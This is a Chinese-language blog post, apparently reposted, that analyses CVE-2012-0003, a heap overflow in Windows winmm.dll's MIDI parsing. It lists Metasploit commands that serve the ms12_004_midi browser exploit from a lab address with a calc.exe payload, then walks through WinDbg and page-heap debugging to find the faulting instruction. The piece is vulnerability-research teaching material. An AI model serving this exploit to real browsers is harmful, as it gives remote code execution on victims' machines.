Quantcast
Channel: CodeSection,代码区,网络安全 - CodeSec
Viewing all articles
Browse latest Browse all 12749

《漏洞战争》cve-2012-0003学习分析 漏洞战争 多媒体库 数据处理不当堆溢出 远程执行任 ...

0
0

《漏洞战争》cve-2012-0003学习分析。这个漏洞是由于微软的多媒体库winmm.dll(c:\windows\system32\winmm.dll)在处理MIDI文件时,由于对数据的处理不当导致的"堆溢出",攻击者可以在网页中嵌入特殊的MIDI文件来远程执行任意代码。

0x01 准备工作

使用msf中的exp:

msfconsole

search cve-2012-0003

use exploit/windows/browser/ms12_004_midi

set uripath test.html

set payload windows/exec

set cmd calc.exe

server started

http://192.168.118.129:8080/test.html

奇怪的是在系统中不存在test.html,但是访问上面生成的网马链接确实会中马,后来查看msf中的exp:ms12_004_midi.rb,里面生成html的代码为:

send_response(cli, html, {'Content-Type'=>'text/html'})

send_response函数在msfapi中有如下用法:

msfapi_send_response

也即相当于msf内置webserver通过send_response函数发送html代码到客户端实现下面这个链接的访问: http://192.168.118.129:8080/test.html

这种方式比较特殊,可能msf的web是ruby的某个类似python下的Django的web框架开发的。

0x02 调试分析

打开iexplore.exe,win+r:cmd:

gflags -i iexplore.exe +hpa

这里如果在windbg中设置!gflag +hpa不会成功,可能是winxp或是windbg的问题,windbg:f6附加iexplore.exe:

!gflag
0:016> !gflag
Current NtGlobalFlag contents: 0x02000000
hpa - Place heap allocations at ends of pages
g
ie打开:http://192.168.118.129:8080/test.html
(180.6f8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000419 ebx=00000073 ecx=0073b29f edx=00000000 esi=16a7f019 edi=16a7cf60
eip=76b2d224 esp=3685fe80 ebp=3685fea0 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
WINMM!midiOutPlayNextPolyEvent+0x1ec:
76b2d224 8a06 mov al,byte ptr [esi] ds:0023:16a7f019=??

到这里只知道76b2d224处有内存访问异常,然而要想写出exp,还需要弄清参数传递过程,这个"堆溢出"cve的利用不是DWORD SHOOT,而是巧妙地构造html代码达到控制eip的目的,如果是利用堆溢出,一般会想到在上面访问异常时通过找到一个DWORD SHOOT的机会来覆盖异常处理相关的函数地址来控制eip,且要在可控数据复制到内存后找到堆分配调用。 win+r:cmd:

gflags -i iexplore.exe -hpa
bu WINMM!midiOutPlayNextPolyEvent
g
ie打开:http://192.168.118.129:8080/test.html
Breakpoint 0 hit
eax=00000000 ebx=ffffffff ecx=7ffdf000 edx=00216790 esi=00216780 edi=002167d8
eip=76b2d038 esp=0012e5b0 ebp=0012e5dc iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
WINMM!midiOutPlayNextPolyEvent:
76b2d038 8bff mov edi,edi
此时中断下来,再看看没有+hpa情况下的:WINMM!midiOutPlayNextPolyEvent+0x1ec会不会访问异常:
bu WINMM!midiOutPlayNextPolyEvent+0x1ec
g
Breakpoint 0 hit
eax=00000251 ebx=0000007f ecx=007f2399 edx=00000000 esi=046de111 edi=025cd4f0
eip=76b2d224 esp=0393fe80 ebp=0393fea0 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
WINMM!midiOutPlayNextPolyEvent+0x1ec:
76b2d224 8a06 mov al,byte ptr [esi] ds:0023:046de111=00
此时中断下来,看到这里的[esi]与上面异常访问时的[esi]不同,考虑到启用页堆是在堆块后增加专门用于检测溢出的栅栏页,以便在堆溢出触及栅栏页时立刻触发异常,而+hpa和-hpa的情况下[esi]不同,应该不是由于页堆造成的[esi]的不同,猜测是由于WINMM!midiOutPlayNextPolyEvent+0x1ec处要执行多遍,而刚开始执行到WINMM!midiOutPlayNextPolyEvent+0x1ec 时,[esi]处是可以访问的,只是msf中设置好的exp数据在后面某一次程序执行到WINMM!midiOutPlayNextPolyEvent+0x1ec时,[esi]产生了变化,并在+hpa时,[esi]属于页堆增加的栅栏页的地址范围才导致+hpa时在某次执行到WINMM!midiOutPlayNextPolyEvent+0x1ec时造成访问异常,为了验证这个想法,进行如下操作: 关闭windbg,重新打开ie,cmd:
gflags -i iexplore.exe +hpa
打开windbg,f6加载iexplore.exe:
bu WINMM!midiOutPlayNextPolyEvent+0x1ec
bu WINMM!midiOutPlayNextPolyEvent
g
ie打开:http://192.168.118.129:8080/test.html
Breakpoint 1 hit
eax=00000000 ebx=ffffffff ecx=7ff9d000 edx=16840f70 esi=16840f60 edi=16840fb8
eip=76b2d038 esp=365bfbe0 ebp=365bfc0c iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
WINMM!midiOutPlayNextPolyEvent:
76b2d038 8bff mov edi,edi
g
Breakpoint 1 hit
eax=00000000 ebx=ffffffff ecx=7ff98000 edx=16840f70 esi=16840f60 edi=16840fb8
eip=76b2d038 esp=3690fea4 ebp=3690fedc iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
WINMM!midiOutPlayNextPolyEvent:
76b2d038 8bff mov edi,edi
这里看到WINMM!midiOutPlayNextPolyEvent第一次运行时不会经过+0x1ec的位置,在+1ec之前就返回了,
Breakpoint 0 hit
eax=00000251 ebx=0000007f ecx=007f2399 edx=00000000 esi=16842e51 edi=16840f60
eip=76b2d224 esp=3690fe80 ebp=3690fea0 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
WINMM!midiOutPlayNextPolyEvent+0x1ec:
76b2d224 8a06 mov al,byte ptr [esi] ds:0023:16842e51=00
这里看到第二次运行WINMM!midiOutPlayNextPolyEvent时第一次运行到+0x1ec处不会产生访问异常,
Breakpoint 0 hit
eax=00000419 ebx=00000073 ecx=0073b29f edx=00000000 esi=16843019 edi=16840f60
eip=76b2d224 esp=3690fe80 ebp=3690fea0 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
WINMM!midiOutPlayNextPolyEvent+0x1ec:
76b2d224 8a06 mov al,byte ptr [esi] ds:0023:16843019=??
这里看到第二次运行WINMM!midiOutPlayNextPolyEvent时第二次运行到+0x1ec处访问异常([esi]不识别),g即可验证,
(51c.674): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000419 ebx=00000073 ecx=0073b29f edx=00000000 esi=16843019 edi=16840f60
eip=76b2d224 esp=3690fe80 ebp=3690fea0 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
WINMM!midiOutPlayNextPolyEvent+0x1ec:
76b2d224 8a06 mov al,byte ptr [esi] ds:0023:16843019=??

这里可以看到的确是会触发异常的,也即+hpa时是第二次运行WINMM!midiOutPlayNextPolyEvent时第二次运行到+0x1ec处会访问异常,-hpa情况会怎样呢?进行如下操作验证:

关闭windbg,重新打开ie:

gflags -i iexplore.exe -hpa
打开windbg,f6加载iexplore.exe:
bu WINMM!midiOutPlayNextPolyEvent+0x1ec
bu WINMM!midiOutPlayNextPolyEvent
g
ie打开:http://192.168.118.129:8080/test.html
Breakpoint 1 hit
eax=00000000 ebx=ffffffff ecx=7ffdf000 edx=0256aa28 esi=0256aa18 edi=0256aa70
eip=76b2d038 esp=0012e5b0 ebp=0012e5dc iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
WINMM!midiOutPlayNextPolyEvent:
76b2d038 8bff mov edi,edi
g
Breakpoint 1 hit
eax=00000000 ebx=ffffffff ecx=7ff98000 edx=0256aa28 esi=0256aa18 edi=0256aa70
eip=76b2d038 esp=0392fea4 ebp=0392fedc iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
WINMM!midiOutPlayNextPolyEvent:
76b2d038 8bff mov edi,edi
g
Breakpoint 0 hit
eax=00000251 ebx=0000007f ecx=007f2399 edx=00000000 esi=025cae59 edi=0256aa18
eip=76b2d224 esp=0392fe80 ebp=0392fea0 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
WINMM!midiOutPlayNextPolyEvent+0x1ec:
76b2d224 8a06 mov al,byte ptr [esi] ds:0023:025cae59=00
g
Breakpoint 0 hit
eax=00000419 ebx=00000073 ecx=0073b29f edx=00000000 esi=025cb021 edi=0256aa18
eip=76b2d224 esp=0392fe80 ebp=0392fea0 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
WINMM!midiOutPlayNextPolyEvent+0x1ec:
76b2d224 8a06 mov al,byte ptr [esi] ds:0023:025cb021=00
可以看到-hpa情况下在第二次运行WINMM!midiOutPlayNextPolyEvent时第二次运行到+0x1ec处是不会产生访问异常的,结合+hpa的功能(定位导致漏洞的代码或函数)可知在第二次运行WINMM!midiOutPlayNextPolyEvent时第二次运行到+0x1ec处的这句指令将导致产生"堆溢出"。

Viewing all articles
Browse latest Browse all 12749